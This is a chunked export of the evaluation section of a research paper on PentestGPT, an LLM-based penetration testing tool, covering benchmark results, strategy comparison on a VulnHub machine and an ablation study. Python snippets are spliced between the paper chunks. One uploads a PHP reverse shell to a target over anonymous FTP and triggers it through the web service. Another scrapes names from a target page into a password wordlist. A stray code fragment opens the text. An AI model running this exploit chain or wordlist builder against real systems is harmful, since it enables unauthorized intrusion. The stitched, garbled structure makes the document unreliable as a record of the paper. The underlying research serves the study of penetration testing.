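    # struggles to keep nuanced penetration-testing context apart.
    print(sorted(scores, reverse=True))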
2308.06782#47 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | # 6. Evaluation In this section, we assess the performance of PENTEST- GPT, focusing on the following four research questions: RQ3 (Performance): How does the performance of PEN- TESTGPT compare with that of native LLM models and human experts? RQ4 (Strategy): Does PENTESTGPT employ different problem-solving strategies compared to those utilized by LLMs or human experts? RQ5 (Ablation): How does each module within PENTEST- GPT contribute to the overall penetration testing perfor- mance? RQ6 (Practicality): Is PENTESTGPT practical and effective in real-world penetration testing tasks? # 6.1. Evaluation Settings We implement PENTESTGPT with 1,700 lines of Python3 code and 740 prompts, available at our anonymized project website [18]. We evaluate its performance over the benchmark constructed in Section 3. In this evaluation, we integrate PENTESTGPT with GPT-3.5 and GPT-4 to form two working versions: PENTESTGPT-GPT-3.5 and PENTESTGPT-GPT-4. | 2308.06782#46 | 2308.06782#48 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#48 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Due to the lack of API access, we do not select other LLM models, such as Bard. In line with our previous experiments, we use the same experiment environment setting and instruct PENTESTGPT to only use the non-automated penetration testing tools. 12 # 6.2. Performance Evaluation (RQ3) The overall task completion status of PENTESTGPT- GPT-3.5, PENTESTGPT-GPT-4, and the naive usage of LLMs is illustrated in Figure 6a. As the Figure shows, our solutions powered by LLMs demonstrate superior penetra- tion testing capabilities compared to the naive application of LLMs. Specifically, PENTESTGPT-GPT-4 surpasses the other three solutions, successfully solving 6 out of 7 easy difficulty targets and 2 out of 4 medium difficulty targets. This performance indicates that PENTESTGPT-GPT-4 can handle penetration testing targets ranging from easy to medium difficulty levels. Meanwhile, PENTESTGPT-GPT- 3.5 manages to solve only two challenges of easy difficulty, a discrepancy that can be attributed to GPT-3.5 lacking the knowledge related to penetration testing found in GPT-4. The sub-task completion status of PENTESTGPT-GPT- 3.5, PENTESTGPT-GPT-4, and the naive usage of LLM is shown in Figure 6b. As the Figure illustrates, both PENTESTGPT-GPT-3.5 and PENTESTGPT-GPT-4 per- form better than the standard utilization of LLMs. It is noteworthy that PENTESTGPT-GPT-4 not only solves one more medium difficulty target compared to naive GPT-4 but also accomplishes 111% more sub-tasks (57 vs. 27). This highlights that our design effectively addresses context loss challenges and leads to more promising testing results. Nevertheless, all the solutions struggle with hard difficulty testing targets. As elaborated in Section 4, hard difficulty targets typically demand a deep understanding from the penetration tester. To reach testing objectives, they may require modifications to existing penetration testing tools or scripts. | 2308.06782#47 | 2308.06782#49 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#49 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Our design does not expand the LLMsâ knowledge of vulnerabilities, so it does not notably enhance perfor- mance on these more complex targets. # 6.3. Strategy Evaluation (RQ4) We then investigate the problem-solving strategies em- ployed by PENTESTGPT, contrasting them with those of LLMs and human experts. By manually analyzing the pen- etration testing process of PENTESTGPT, we synthesize its underlying approaches to problem-solving. We surprisingly find that PENTESTGPT decomposes the penetration test- ing task in a manner akin to human experts, successfully achieving the overall goal. Instead of focusing solely on the most recently discovered task, PENTESTGPT can pinpoint potential sub-tasks likely to lead to successful outcomes. Figure 7 provides an illustrative example, demonstrating the strategic differences between GPT-4 and PENTESTGPT while handling the VulnHub machine, Hackable II [47]. This target comprises two vulnerable services: an FTP service allowing arbitrary file uploads and a web service enabling file viewing through FTP. A successful exploit necessitates exploiting both services by uploading a malicious PHP through the shell via the FTP service and triggering it web service. As depicted in the figure, GPT-4 begins by enumerating the FTP service and successfully identifies the file upload vulnerability (â | 2308.06782#48 | 2308.06782#50 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#50 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | [Figure 6 chart content: grouped bar charts comparing GPT-3.5, GPT-4, PENTESTGPT-GPT-3.5, and PENTESTGPT-GPT-4 over Easy, Medium, and Hard targets; panel (a) shows overall target completion and panel (b) shows sub-task completion.] | 2308.06782#49 | 2308.06782#51 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#51 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | (b) Subtask completion status. Figure 6: The PENTESTGPT-GPT-3.5, on overall target completion and sub-task completion. this with the web service, resulting in an incomplete exploit in the following steps. Conversely, PENTESTGPT follows a more holistic approach, toggling between enumerating the FTP service and browsing the web service. In particular, PENTESTGPT firstly â ¶ enumerates the FTP service and â · web service to understand the general situation. It then â ¸ prioritizes the FTP service, and â ¹ eventually discovers the file upload vulnerability. More importantly, in this process, PENTESTGPT identifies that files available on FTP are the same as those on the web service. By connecting these findings, PENTESTGPT guides the tester to â º perform a shell upload, â » leading to a successful reverse shell. This strategy aligns with the walkthrough solution and highlights PENTESTGPTâ s comprehensive understanding of the pene- tration testing process and its ability to make effective de- cisions on the optimal sub-task to pursue next. This reveals PENTESTGPTâ s strategic thinking and ability to integrate different aspects of the testing process. Our second observation is that although PENTESTGPT behaves more similarly to human experts, it still exhibits some strategies that humans will not apply. For instance, PENTESTGPT still prioritizes brute-force attacks before vul- nerability scanning. This is obvious in cases where PEN- TESTGPT always tries to brute-force the SSH service on target machines. We then analyze the failed penetration testing cases to understand the limitations of PENTESTGPT. Beyond the absence of some advanced penetration testing techniques, two primary issues emerge. First, PENTESTGPT struggles | 2308.06782#50 | 2308.06782#52 | 2308.06782 | [
"2305.13860"
]
|
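A minimal sketch of this FTP-upload-then-web-trigger chain, assuming a hypothetical target at 10.10.10.5 whose anonymous-writable FTP root is served by the web application under /files/; the address, path, and payload name are invented placeholders, not details from the Hackable II walkthrough or from PentestGPT's output.

```python
# Sketch of the exploit chain only; 10.10.10.5, /files/, and shell.php are placeholders.
import ftplib
import urllib.request

TARGET = "10.10.10.5"      # hypothetical target IP
PAYLOAD = "shell.php"      # a PHP reverse shell prepared in the current directory

# Step 1 (FTP flow): upload the payload through the anonymous-writable FTP service.
with ftplib.FTP(TARGET) as ftp:
    ftp.login("anonymous", "anonymous@example.com")
    with open(PAYLOAD, "rb") as fh:
        ftp.storbinary(f"STOR {PAYLOAD}", fh)

# Step 2 (web flow): request the uploaded file via the web service that exposes the
# same directory, which executes the PHP and triggers the reverse shell.
try:
    urllib.request.urlopen(f"http://{TARGET}/files/{PAYLOAD}", timeout=10)
except Exception:
    pass  # the request usually hangs or times out once the shell connects back
```

The final request typically blocks while the PHP reverse shell connects back to a separately prepared listener, so the timeout firing is expected rather than an error.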
2308.06782#52 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | [Figure 7 diagram: parallel flows (port scanning, FTP service, web scanning, file browsing) for GPT-4, where Flow 1 & 2 are independent, and for PentestGPT, where Flow 1 & 2 are interrelated.] Figure 7: | 2308.06782#51 | 2308.06782#53 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#53 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing strategy comparison between GPT-4 and PENTESTGPT on VulnHub-Hackable II. to interpret images. LLMs are limited to text comprehension, so they cannot accurately process images. This issue might be addressed by developing large multimodal models to understand both text and visual data. Second, it cannot grasp certain social engineering tricks and subtle cues. For instance, real-world penetration testers often create brute-force wordlists using information gathered from the target service. Though PENTESTGPT can retrieve a list of names from a web service, it fails to instruct the use of tools to create a wordlist from those names. | 2308.06782#52 | 2308.06782#54 | 2308.06782 | [
"2305.13860"
]
|
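The missed step called out here, turning gathered names into a brute-force wordlist, is straightforward to illustrate. The sketch below is an assumption-laden example: the URL, the name-extraction regex, and the mangling suffixes are invented, and in practice a tester would more likely reach for dedicated tools such as CeWL or CUPP.

```python
# Hypothetical example: build a small password wordlist from names found on a target page.
import itertools
import re
import urllib.request

URL = "http://10.10.10.5/about.html"   # invented page that lists staff names
html = urllib.request.urlopen(URL, timeout=10).read().decode(errors="ignore")

# Naive extraction: capitalized "First Last" pairs appearing in the page text.
names = set(re.findall(r"\b([A-Z][a-z]+)\s+([A-Z][a-z]+)\b", html))

candidates = set()
for first, last in names:
    bases = {first.lower(), last.lower(),
             first.lower() + last.lower(), first[0].lower() + last.lower()}
    # Common mangling: suffixes that users frequently append to passwords.
    for base, suffix in itertools.product(bases, ["", "1", "123", "2023", "!"]):
        candidates.add(base + suffix)

with open("wordlist.txt", "w") as out:
    out.write("\n".join(sorted(candidates)))
```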
2308.06782#54 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | These limitations underline the necessity for improvement in areas where human insight and intricate reasoning are still more proficient than automated solutions. # 6.4. Ablation Study (RQ5) We perform an ablation study on how the three modules (Reasoning Module, Generation Module, and Parsing Module) contribute to the performance of PENTESTGPT. We implement three variants: 1) PENTESTGPT-NO-PARSING: the Parsing Module is deactivated, causing all data to be directly fed into the system. 2) PENTESTGPT-NO-GENERATION: the Generation Module is deactivated, leading to the completion of task generation within the Reasoning Module itself. The prompts for task generation remain consistent. 3) PENTESTGPT-NO-REASONING: the Reasoning Module is disabled. Instead of the PTT, this variant adopts the same methodology utilized with LLMs for penetration testing, as delineated in the Exploratory Study. All the variants are integrated with the GPT-4 API for testing. The results of the three variants tested on our penetration testing benchmarks are depicted in Figure 8. In general, PENTESTGPT demonstrates superiority over the three ablation baselines regarding overall target and sub-task completion. Our key findings are as follows: (1) In the absence of the Parsing Module, PENTESTGPT-NO-PARSING attains marginally lower performance in overall task and sub-task completion relative to the full configuration. While parsing information is advantageous in penetration testing, | 2308.06782#53 | 2308.06782#55 | 2308.06782 | [
"2305.13860"
]
|
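The three variants correspond to switching off one stage of the module pipeline. The sketch below is purely illustrative: the class and method names are invented and do not mirror PentestGPT's actual implementation; it only indicates which stage each ablation removes.

```python
# Illustrative pipeline skeleton; names are invented and the LLM-backed methods are stubs.
from dataclasses import dataclass

@dataclass
class AblationPipeline:
    use_parsing: bool = True      # off => PENTESTGPT-NO-PARSING (raw tool output fed directly)
    use_reasoning: bool = True    # off => PENTESTGPT-NO-REASONING (no Pentesting Task Tree)
    use_generation: bool = True   # off => PENTESTGPT-NO-GENERATION (no command expansion)

    def step(self, raw_tool_output: str):
        text = self._parse(raw_tool_output) if self.use_parsing else raw_tool_output
        if self.use_reasoning:
            task = self._update_ptt_and_pick_subtask(text)   # PTT-based sub-task selection
        else:
            task = self._ask_llm_directly(text)              # naive LLM usage, as in the Exploratory Study
        return self._expand_to_commands(task) if self.use_generation else task

    # Stubs standing in for LLM calls in a real system.
    def _parse(self, text): raise NotImplementedError
    def _update_ptt_and_pick_subtask(self, text): raise NotImplementedError
    def _ask_llm_directly(self, text): raise NotImplementedError
    def _expand_to_commands(self, task): raise NotImplementedError
```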
2308.06782#55 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | [Figure 8, panel (a): overall completion status of PentestGPT, PentestGPT-no-Parsing, PentestGPT-no-Generation, and PentestGPT-no-Reasoning on Easy, Medium, and Hard targets.] | 2308.06782#54 | 2308.06782#56 | 2308.06782 | [
"2305.13860"
]
|
2308.06782#56 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | (b) Sub-task completion status. Figure 8: The performance of PENTESTGPT, PENTESTGPT-NO-PARSING, PENTESTGPT-NO-GENERATION, and PENTESTGPT-NO-REASONING on overall target completion and sub-task completion. the 32k token size limit often suffices for various outputs. Given the Reasoning Module's inherent design to maintain the entire testing context, the lack of the Parsing Module does not substantially impair the tool's performance. (2) PENTESTGPT-NO-REASONING fares the worst, completing only 53.6% of the sub-tasks achieved by the full solution, an outcome even inferior to the naive application of GPT-4 in testing. We attribute this to the Generation Module adding supplementary sub-tasks to the LLM context. Since the prompts are not tailored for scenarios without the Reasoning Module, the resulting outputs are irrelevant for the naive LLM without the Generation Module. Furthermore, the extended generation output obscures the original context, hindering the LLM's ability to concentrate on the task, thus failing the test. (3) PENTESTGPT-NO-GENERATION realizes performance slightly above that of GPT-4 employed naively. This occurs because, without the Generation Module, the testing procedure closely resembles the naive usage of LLMs. Notably, the Generation Module is principally intended to guide the tester in executing precise penetration testing operations. Without it, the tester may have to depend on supplementary information to operate the tools or scripts essential for completing the test. # 6.5. Practicality Study (RQ6) We demonstrate that PENTESTGPT exhibits practicality for real-world penetration testing beyond the crafted benchmark. For this purpose, we engage PENTESTGPT in the | 2308.06782#55 | 2308.06782#57 | 2308.06782 | [
"2305.13860"
]
|